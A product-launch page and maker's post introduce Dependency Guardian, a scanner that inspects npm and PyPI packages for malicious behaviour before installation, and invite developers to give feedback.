Dependency Guardian - Supply chain protection that blocks malware at install

by
Static supply chain scanner catches npm & PyPI attack patterns CVE databases miss: install scripts, credential theft, child process spawning, network exfil. 100 detectors, sandbox routing for eligible packages, GitHub App + CLI. Free plan.

Add a comment

Replies

Best
I've been building a tool called Dependency Guardian, and I'm looking for developers and security engineers to try it out. I built it because I wanted protection from malicious npm and PyPI packages without changing how I work. When I went looking for something that already did this, I noticed traditional CVE based scanning had a blind spot where it only catches problems after they've been reported, and assigned a CVE. Which leaves a window where a malicious package can spread before anyone flags it. The tool sits in front of package installs and inspects everything that actually lands on your machine. analyzing packages for suspicious behavior and supply chain risk signals before they install. A few things it does: Aliases to npm install and pip, so you keep using the commands you already know Returns a warn, block, or pass, and prompts on ambiguity Runs as both a GitHub App and a CLI I'd really like feedback from engineers who work with Node, Python, or dependency security. What would stop you from trusting a tool like this? And what would make it useful enough to run every day?